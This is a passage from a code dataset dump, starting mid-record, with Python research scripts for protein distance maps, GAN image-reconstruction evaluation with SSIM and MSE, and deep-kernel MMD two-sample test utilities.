len(all_inds[i]) != 0 and len(all_inds[j]) != 0:\n\t\t\t\tatom_pairs[0,0] = all_inds[i]\n\t\t\t\tatom_pairs[0,1] = all_inds[j]\n\t\t\t\tdistances = md.compute_distances(traj, atom_pairs, periodic=False)\n\n\t\t\t\tif len(distances) == 0:\n\t\t\t\t\tprint('The chosen residue does not exist!')\n\n\t\t\t\t# The distance between residues is min distance between all heavy atoms. 
\n\t\t\t\t# Take residual to get rid of cut-off.\n\t\t\t\tmin_distance = np.min(distances,axis=1)\n\t\t\t\t\n\t\t\t\tif compr:\n\t\t\t\t\tdistance_matrices[:,counter] = 1.0/min_distance\n\t\t\t\t\tcounter = counter + 1\n\t\t\t\telse:\n\t\t\t\t\tdistance_matrices[:,i,j] = 1/min_distance\n\t\t\t\t\tdistance_matrices[:,j,i] = 1/min_distance\n\treturn distance_matrices\n\ndef main(parser):\n\n\tinit = MD_init.MD_initializer()\n\n\t# Initialize trajectory\n\ttraj, args = init.initialize_trajectory(parser)\n\tdomain_label='full'\n\t\n\tif args.cterm:\n\t\t# Select C-term domain\n\t\tstartID = 82\n\t\tendID = 147\n\t\tdomain_label='cterm'\n\telif args.nterm:\n\t\t# Select N-term domain\n\t\tstartID = 5\n\t\tendID = 63\n\t\tdomain_label='nterm'\n\telse:\n\t\t# Full protein (startID == -1 is handled by getAllCalphaInverseDistances)\n\t\tstartID = -1\n\t\tendID = -1\n\t\n\tprint('Compute all inverse-distance C_alpha maps')\n\tprint('Atom choice: residue ' + str(startID)+' to '+str(endID))\n\tdistance_maps = getAllCalphaInverseDistances(traj, startID=startID,endID=endID,compr=True)\t\n\tnp.save(args.out_directory+'inverse_CA_'+domain_label+'_'+args.file_end_name+'.npy',distance_maps)\n\t\nparser = argparse.ArgumentParser(epilog='Creating distance maps used for clustering/classification. Author: Annie Westerlund.')\nparser.add_argument('-nterm','--nterm',help='Compute distance maps for N-term domain.',action='store_true')\nparser.add_argument('-cterm','--cterm',help='Compute distance maps for C-term domain.',action='store_true')\nmain(parser)\n","sub_path":"cluster_classifier/create_distance_maps.py","file_name":"create_distance_maps.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115710462","text":"import os\nimport random\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom progressbar import Percentage, Bar, ETA, ProgressBar\nimport imageio\nfrom skimage.metrics import structural_similarity\n\nfrom datasets.longitudinal_dataset import LongitudinalDataset\nfrom experiments.exp_2020_05_09_3 import get_encoder_decoder_generator_discriminator\nfrom testing.utils import preprocess_image, postprocess_image, mse_float, mse_uint8\n\n\nencoder, decoder, generator, discriminator, EXPERIMENT_FOLDER = get_encoder_decoder_generator_discriminator(return_experiment_folder=True)\n\nif not os.path.isdir(os.path.join(EXPERIMENT_FOLDER, 'testing')):\n    os.makedirs(os.path.join(EXPERIMENT_FOLDER, 'testing'))\n\n# encoder.save(os.path.join(EXPERIMENT_FOLDER, 'testing', 'encoder'), include_optimizer=False)\n\ndata_dir = '/Users/umutkucukaslan/Desktop/thesis/dataset/processed_data'\nN_SAMPLES = 500\n\ntrain_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'train'))\nval_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'val'))\ntest_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'test'))\n\n\n\n# ====================================\n# define cases for testing\ncases = []\n\nimg_paths = train_dataset.get_ad_images()\ntitle = 'train_ad'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = train_dataset.get_mci_images()\ntitle = 'train_mci'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = train_dataset.get_cn_images()\ntitle = 'train_cn'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = 
test_dataset.get_ad_images()\ntitle = 'test_ad'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = test_dataset.get_mci_images()\ntitle = 'test_mci'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = test_dataset.get_cn_images()\ntitle = 'test_cn'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# ====================================\n\n\nfor img_paths, title in cases:\n\n widgets = [\n \"Running: \",\n Percentage(),\n \" \",\n Bar(marker=\"#\", left=\"[\", right=\"]\"),\n \" \",\n ETA(),\n ]\n pbar = ProgressBar(widgets=widgets, maxval=len(img_paths))\n pbar.start()\n ssim_indexes = []\n mses = []\n print('starting...')\n for idx in range(len(img_paths)):\n print(title, ' ', idx, ' / ', len(img_paths))\n img_path = img_paths[idx]\n img = imageio.imread(img_path)\n preprocessed_img = preprocess_image(img)\n generated_img = generator(preprocessed_img)\n generated_img = generated_img.numpy()\n generated_img = postprocess_image(generated_img)\n\n ssim_index = structural_similarity(im1=img, im2=generated_img, data_range=255)\n ssim_indexes.append(ssim_index)\n\n mse = mse_uint8(im1=img, im2=generated_img)\n mses.append(mse)\n pbar.update(idx)\n # print('ssim index: {}'.format(round(ssim_index, 2)))\n # img = np.hstack((img, generated_img))\n # cv2.imshow('img', img)\n # pressed_key = cv2.waitKey()\n # if pressed_key == ord('q'):\n # break\n pbar.finish()\n\n mean_ssim = np.mean(ssim_indexes)\n std_ssim = np.std(ssim_indexes)\n print('mean ssim : {}'.format(mean_ssim))\n print('std ssim : {}'.format(std_ssim))\n\n mean_ssim = round(mean_ssim, 4)\n std_ssim = round(std_ssim, 4)\n\n mean_mse = np.mean(mses)\n std_mse = np.std(mses)\n print('mean mse : {}'.format(mean_mse))\n print('std mse : {}'.format(std_mse))\n\n mean_mse = round(mean_mse, 4)\n std_mse = round(std_mse, 4)\n\n plt.figure()\n figure_path = os.path.join(EXPERIMENT_FOLDER, 'testing', 'ssim_' + title + '.jpg')\n plt.hist(ssim_indexes, bins=30)\n plt.title(title + '_ssim mean: {} std: {}'.format(mean_ssim, std_ssim))\n plt.xlabel('SSIM index')\n plt.ylabel('# images')\n plt.savefig(figure_path, dpi=300)\n\n plt.figure()\n figure_path = os.path.join(EXPERIMENT_FOLDER, 'testing', 'mse_' + title + '.jpg')\n plt.hist(mses, bins=30)\n plt.title(title + '_mse mean: {} std: {}'.format(mean_mse, std_mse))\n plt.xlabel('MSE')\n plt.ylabel('# images')\n plt.savefig(figure_path, dpi=300)\n\n plt.show()\n\n\n\n","sub_path":"testing/exp_2020_05_01_ssim_mse.py","file_name":"exp_2020_05_01_ssim_mse.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417168459","text":"import numpy as np\r\nimport torch\r\nimport torchvision # use it for torch.utils.data\r\nimport freqopttest.data as data\r\nimport freqopttest.tst as tst\r\nimport scipy.stats as stats\r\nimport pdb\r\n\r\nis_cuda = True\r\n\r\nclass ModelLatentF(torch.nn.Module):\r\n \"\"\"define deep networks.\"\"\"\r\n def __init__(self, x_in, H, x_out):\r\n \"\"\"Init latent features.\"\"\"\r\n super(ModelLatentF, self).__init__()\r\n self.restored = False\r\n\r\n self.latent = torch.nn.Sequential(\r\n torch.nn.Linear(x_in, H, bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, H, bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, H, 
bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, x_out, bias=True),\r\n )\r\n def forward(self, input):\r\n \"\"\"Forward the LeNet.\"\"\"\r\n fealant = self.latent(input)\r\n return fealant\r\n\r\ndef get_item(x, is_cuda):\r\n \"\"\"get the numpy value from a torch tensor.\"\"\"\r\n if is_cuda:\r\n x = x.cpu().detach().numpy()\r\n else:\r\n x = x.detach().numpy()\r\n return x\r\n\r\ndef MatConvert(x, device, dtype):\r\n \"\"\"convert the numpy to a torch tensor.\"\"\"\r\n x = torch.from_numpy(x).to(device, dtype)\r\n return x\r\n\r\ndef Pdist2(x, y):\r\n \"\"\"compute the paired distance between x and y.\"\"\"\r\n x_norm = (x ** 2).sum(1).view(-1, 1)\r\n if y is not None:\r\n y_norm = (y ** 2).sum(1).view(1, -1)\r\n else:\r\n y = x\r\n y_norm = x_norm.view(1, -1)\r\n Pdist = x_norm + y_norm - 2.0 * torch.mm(x, torch.transpose(y, 0, 1))\r\n Pdist[Pdist<0]=0\r\n return Pdist\r\n\r\ndef h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed, use_1sample_U=True):\r\n \"\"\"compute value of MMD and std of MMD using kernel matrix.\"\"\"\r\n Kxxy = torch.cat((Kx,Kxy),1)\r\n Kyxy = torch.cat((Kxy.transpose(0,1),Ky),1)\r\n Kxyxy = torch.cat((Kxxy,Kyxy),0)\r\n nx = Kx.shape[0]\r\n ny = Ky.shape[0]\r\n is_unbiased = True\r\n if is_unbiased:\r\n xx = torch.div((torch.sum(Kx) - torch.sum(torch.diag(Kx))), (nx * (nx - 1)))\r\n yy = torch.div((torch.sum(Ky) - torch.sum(torch.diag(Ky))), (ny * (ny - 1)))\r\n # one-sample U-statistic.\r\n if use_1sample_U:\r\n xy = torch.div((torch.sum(Kxy) - torch.sum(torch.diag(Kxy))), (nx * (ny - 1)))\r\n else:\r\n xy = torch.div(torch.sum(Kxy), (nx * ny))\r\n mmd2 = xx - 2 * xy + yy\r\n else:\r\n xx = torch.div((torch.sum(Kx)), (nx * nx))\r\n yy = torch.div((torch.sum(Ky)), (ny * ny))\r\n # one-sample U-statistic.\r\n if use_1sample_U:\r\n xy = torch.div((torch.sum(Kxy)), (nx * ny))\r\n else:\r\n xy = torch.div(torch.sum(Kxy), (nx * ny))\r\n mmd2 = xx - 2 * xy + yy\r\n if not is_var_computed:\r\n return mmd2, None, Kxyxy\r\n hh = Kx+Ky-Kxy-Kxy.transpose(0,1)\r\n V1 = torch.dot(hh.sum(1)/ny,hh.sum(1)/ny) / ny\r\n V2 = (hh).sum() / (nx) / nx\r\n varEst = 4*(V1 - V2**2)\r\n if varEst == 0.0:\r\n print('error_var!!'+str(V1))\r\n return mmd2, varEst, Kxyxy\r\n\r\ndef MMDu(Fea, len_s, Fea_org, sigma, sigma0=0.1, epsilon = 10**(-10), is_smooth=True, is_var_computed=True, use_1sample_U=True):\r\n \"\"\"compute value of deep-kernel MMD and std of deep-kernel MMD using merged data.\"\"\"\r\n X = Fea[0:len_s, :] # fetch the sample 1 (features of deep networks)\r\n Y = Fea[len_s:, :] # fetch the sample 2 (features of deep networks)\r\n X_org = Fea_org[0:len_s, :] # fetch the original sample 1\r\n Y_org = Fea_org[len_s:, :] # fetch the original sample 2\r\n L = 1 # generalized Gaussian (if L>1)\r\n\r\n nx = X.shape[0]\r\n ny = Y.shape[0]\r\n Dxx = Pdist2(X, X)\r\n Dyy = Pdist2(Y, Y)\r\n Dxy = Pdist2(X, Y)\r\n Dxx_org = Pdist2(X_org, X_org)\r\n Dyy_org = Pdist2(Y_org, Y_org)\r\n Dxy_org = Pdist2(X_org, Y_org)\r\n K_Ix = torch.eye(nx).cuda()\r\n K_Iy = torch.eye(ny).cuda()\r\n if is_smooth:\r\n Kx = (1-epsilon) * torch.exp(-(Dxx / sigma0)**L -Dxx_org / sigma) + epsilon * torch.exp(-Dxx_org / sigma)\r\n Ky = (1-epsilon) * torch.exp(-(Dyy / sigma0)**L -Dyy_org / sigma) + epsilon * torch.exp(-Dyy_org / sigma)\r\n Kxy = (1-epsilon) * torch.exp(-(Dxy / sigma0)**L -Dxy_org / sigma) + epsilon * torch.exp(-Dxy_org / sigma)\r\n else:\r\n Kx = torch.exp(-Dxx / sigma0)\r\n Ky = torch.exp(-Dyy / sigma0)\r\n Kxy = torch.exp(-Dxy / sigma0)\r\n\r\n return h1_mean_var_gram(Kx, Ky, Kxy, 
is_var_computed, use_1sample_U)\r\n\r\ndef MMDu_linear_kernel(Fea, len_s, is_var_computed=True, use_1sample_U=True):\r\n \"\"\"compute value of (deep) lineaer-kernel MMD and std of (deep) lineaer-kernel MMD using merged data.\"\"\"\r\n try:\r\n X = Fea[0:len_s, :]\r\n Y = Fea[len_s:, :]\r\n except:\r\n X = Fea[0:len_s].unsqueeze(1)\r\n Y = Fea[len_s:].unsqueeze(1)\r\n\r\n Kx = X.mm(X.transpose(0,1))\r\n Ky = Y.mm(Y.transpose(0,1))\r\n Kxy = X.mm(Y.transpose(0,1))\r\n\r\n return h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed, use_1sample_U)\r\n\r\ndef C2ST_NN_fit(S,y,N1,x_in,H,x_out,learning_rate_C2ST,N_epoch,batch_size,device,dtype):\r\n \"\"\"Train a deep network for C2STs.\"\"\"\r\n N = S.shape[0]\r\n if is_cuda:\r\n model_C2ST = ModelLatentF(x_in, H, x_out).cuda()\r\n else:\r\n model_C2ST = ModelLatentF(x_in, H, x_out)\r\n w_C2ST = torch.randn([x_out, 2]).to(device, dtype)\r\n b_C2ST = torch.randn([1, 2]).to(device, dtype)\r\n w_C2ST.requires_grad = True\r\n b_C2ST.requires_grad = True\r\n optimizer_C2ST = torch.optim.Adam(list(model_C2ST.parameters()) + [w_C2ST] + [b_C2ST], lr=learning_rate_C2ST)\r\n criterion = torch.nn.CrossEntropyLoss()\r\n f = torch.nn.Softmax()\r\n ind = np.random.choice(N, N, replace=False)\r\n tr_ind = ind[:np.int(np.ceil(N * 1))]\r\n te_ind = tr_ind\r\n dataset = torch.utils.data.TensorDataset(S[tr_ind, :], y[tr_ind])\r\n dataloader_C2ST = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)\r\n len_dataloader = len(dataloader_C2ST)\r\n for epoch in range(N_epoch):\r\n data_iter = iter(dataloader_C2ST)\r\n tt = 0\r\n while tt < len_dataloader:\r\n # training model using source data\r\n data_source = data_iter.next()\r\n S_b, y_b = data_source\r\n output_b = model_C2ST(S_b).mm(w_C2ST) + b_C2ST\r\n loss_C2ST = criterion(output_b, y_b)\r\n optimizer_C2ST.zero_grad()\r\n loss_C2ST.backward(retain_graph=True)\r\n # Update sigma0 using gradient descent\r\n optimizer_C2ST.step()\r\n tt = tt + 1\r\n if epoch % 100 == 0:\r\n print(criterion(model_C2ST(S).mm(w_C2ST) + b_C2ST, y).item())\r\n\r\n output = f(model_C2ST(S[te_ind, :]).mm(w_C2ST) + b_C2ST)\r\n pred = output.max(1, keepdim=True)[1]\r\n STAT_C2ST = abs(pred[:N1].type(torch.FloatTensor).mean() - pred[N1:].type(torch.FloatTensor).mean())\r\n return pred, STAT_C2ST, model_C2ST, w_C2ST, b_C2ST\r\n\r\ndef gauss_kernel(X, test_locs, X_org, test_locs_org, sigma, sigma0, epsilon):\r\n \"\"\"compute a deep kernel matrix between a set of samples between test locations.\"\"\"\r\n DXT = Pdist2(X, test_locs)\r\n DXT_org = Pdist2(X_org, test_locs_org)\r\n # Kx = torch.exp(-(DXT / sigma0))\r\n Kx = (1 - epsilon) * torch.exp(-(DXT / sigma0) - DXT_org / sigma) + epsilon * torch.exp(-DXT_org / sigma)\r\n return Kx\r\n\r\ndef compute_ME_stat(X, Y, T, X_org, Y_org, T_org, sigma, sigma0, epsilon):\r\n \"\"\"compute a deep kernel based ME statistic.\"\"\"\r\n # if gwidth is None or gwidth <= 0:\r\n # raise ValueError('require gaussian_width > 0. Was %s.' 
% (str(gwidth)))\r\n reg = 0#10**(-8)\r\n n = X.shape[0]\r\n J = T.shape[0]\r\n g = gauss_kernel(X, T, X_org, T_org, sigma, sigma0, epsilon)\r\n h = gauss_kernel(Y, T, Y_org, T_org, sigma, sigma0, epsilon)\r\n Z = g - h\r\n W = Z.mean(0)\r\n Sig = ((Z - W).transpose(1, 0)).mm((Z - W))\r\n if is_cuda:\r\n IJ = torch.eye(J).cuda()\r\n else:\r\n IJ = torch.eye(J)\r\n s = n*W.unsqueeze(0).mm(torch.solve(W.unsqueeze(1),Sig + reg*IJ)[0])\r\n return s\r\n\r\ndef mmd2_permutations(K, n_X, permutations=200):\r\n \"\"\"\r\n Fast implementation of permutations using kernel matrix.\r\n \"\"\"\r\n K = torch.as_tensor(K)\r\n n = K.shape[0]\r\n assert K.shape[0] == K.shape[1]\r\n n_Y = n_X\r\n assert n == n_X + n_Y\r\n w_X = 1\r\n w_Y = -1\r\n ws = torch.full((permutations + 1, n), w_Y, dtype=K.dtype, device=K.device)\r\n ws[-1, :n_X] = w_X\r\n for i in range(permutations):\r\n ws[i, torch.randperm(n)[:n_X].numpy()] = w_X\r\n biased_ests = torch.einsum(\"pi,ij,pj->p\", ws, K, ws)\r\n if True: # u-stat estimator\r\n # need to subtract \\sum_i k(X_i, X_i) + k(Y_i, Y_i) + 2 k(X_i, Y_i)\r\n # first two are just trace, but last is harder:\r\n is_X = ws > 0\r\n X_inds = is_X.nonzero()[:, 1].view(permutations + 1, n_X)\r\n Y_inds = (~is_X).nonzero()[:, 1].view(permutations + 1, n_Y)\r\n del is_X, ws\r\n cross_terms = K.take(Y_inds * n + X_inds).sum(1)\r\n del X_inds, Y_inds\r\n ests = (biased_ests - K.trace() + 2 * cross_terms) / (n_X * (n_X - 1))\r\n est = ests[-1]\r\n rest = ests[:-1]\r\n p_val = (rest > est).float().mean()\r\n return est.item(), p_val.item(), rest\r\n\r\ndef TST_MMD_adaptive_bandwidth(Fea, N_per, N1, Fea_org, sigma, sigma0, alpha, device, dtype):\r\n \"\"\"run two-sample test (TST) using ordinary Gaussian kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n TEMP = MMDu(Fea, N1, Fea_org, sigma, sigma0, is_smooth=False)\r\n mmd_value = get_item(TEMP[0],is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_MMD_u(Fea, N_per, N1, Fea_org, sigma, sigma0, ep, alpha, device, dtype, is_smooth=True):\r\n \"\"\"run two-sample test (TST) using deep kernel kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n TEMP = MMDu(Fea, N1, Fea_org, sigma, sigma0, ep, is_smooth)\r\n mmd_value = get_item(TEMP[0], is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if 
count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_MMD_u_linear_kernel(Fea, N_per, N1, alpha, device, dtype):\r\n \"\"\"run two-sample test (TST) using (deep) lineaer kernel kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n TEMP = MMDu_linear_kernel(Fea, N1)\r\n mmd_value = get_item(TEMP[0], is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_C2ST(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST,device,dtype):\r\n \"\"\"run C2ST-S on non-image datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(pred_C2ST[:N1].type(torch.FloatTensor).mean() - pred_C2ST[N1:].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(pred_C2ST[ind_X].type(torch.FloatTensor).mean() - pred_C2ST[ind_Y].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n # if STAT.item() < threshold_lower:\r\n # h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_LCE(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST, device,dtype):\r\n \"\"\"run C2ST-L on non-image datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n # pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_ME(Fea, N1, 
alpha, is_train, test_locs, gwidth, J = 1, seed = 15):\r\n \"\"\"run ME test.\"\"\"\r\n Fea = get_item(Fea,is_cuda)\r\n tst_data = data.TSTData(Fea[0:N1,:], Fea[N1:,:])\r\n h = 0\r\n if is_train:\r\n op = {\r\n 'n_test_locs': J, # number of test locations to optimize\r\n 'max_iter': 300, # maximum number of gradient ascent iterations\r\n 'locs_step_size': 1.0, # step size for the test locations (features)\r\n 'gwidth_step_size': 0.1, # step size for the Gaussian width\r\n 'tol_fun': 1e-4, # stop if the objective does not increase more than this.\r\n 'seed': seed + 5, # random seed\r\n }\r\n test_locs, gwidth, info = tst.MeanEmbeddingTest.optimize_locs_width(tst_data, alpha, **op)\r\n return test_locs, gwidth\r\n else:\r\n met_opt = tst.MeanEmbeddingTest(test_locs, gwidth, alpha)\r\n test_result = met_opt.perform_test(tst_data)\r\n if test_result['h0_rejected']:\r\n h = 1\r\n return h\r\n\r\ndef TST_SCF(Fea, N1, alpha, is_train, test_freqs, gwidth, J = 1, seed = 15):\r\n \"\"\"run SCF test.\"\"\"\r\n Fea = get_item(Fea,is_cuda)\r\n tst_data = data.TSTData(Fea[0:N1,:], Fea[N1:,:])\r\n h = 0\r\n if is_train:\r\n op = {'n_test_freqs': J, 'seed': seed, 'max_iter': 300,\r\n 'batch_proportion': 1.0, 'freqs_step_size': 0.1,\r\n 'gwidth_step_size': 0.01, 'tol_fun': 1e-4}\r\n test_freqs, gwidth, info = tst.SmoothCFTest.optimize_freqs_width(tst_data, alpha, **op)\r\n return test_freqs, gwidth\r\n else:\r\n scf_opt = tst.SmoothCFTest(test_freqs, gwidth, alpha=alpha)\r\n test_result = scf_opt.perform_test(tst_data)\r\n if test_result['h0_rejected']:\r\n h = 1\r\n return h\r\n\r\ndef TST_C2ST_D(S,N1,N_per,alpha,discriminator,device,dtype):\r\n \"\"\"run C2ST-S on MNIST and CIFAR datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = discriminator(S)\r\n pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(pred_C2ST[:N1].type(torch.FloatTensor).mean() - pred_C2ST[N1:].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n STAT_vector[r] = abs(pred_C2ST[ind_X].type(torch.FloatTensor).mean() - pred_C2ST[ind_Y].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_LCE_D(S,N1,N_per,alpha,discriminator,device,dtype):\r\n \"\"\"run C2ST-L on MNIST and CIFAR datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = discriminator(S)\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_ME_DK(X, Y, T, X_org, Y_org, T_org, alpha, sigma, sigma0, 
epsilon, flag_debug = False):\r\n    \"\"\"run deep-kernel ME test (using chi^2 to confirm the threshold) on CIFAR datasets (this code does not work).\"\"\"\r\n    J = T.shape[0]\r\n    s = compute_ME_stat(X, Y, T, X_org, Y_org, T_org, sigma, sigma0, epsilon)\r\n    pvalue = stats.chi2.sf(s.item(), J)\r\n    threshold = stats.chi2.ppf(1 - alpha, J)\r\n    h = 0\r\n    if pvalue < alpha:\r\n        h = 1\r\n    return h, threshold, s","sub_path":"utils_HD.py","file_name":"utils_HD.py","file_ext":"py","file_size_in_byte":20457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
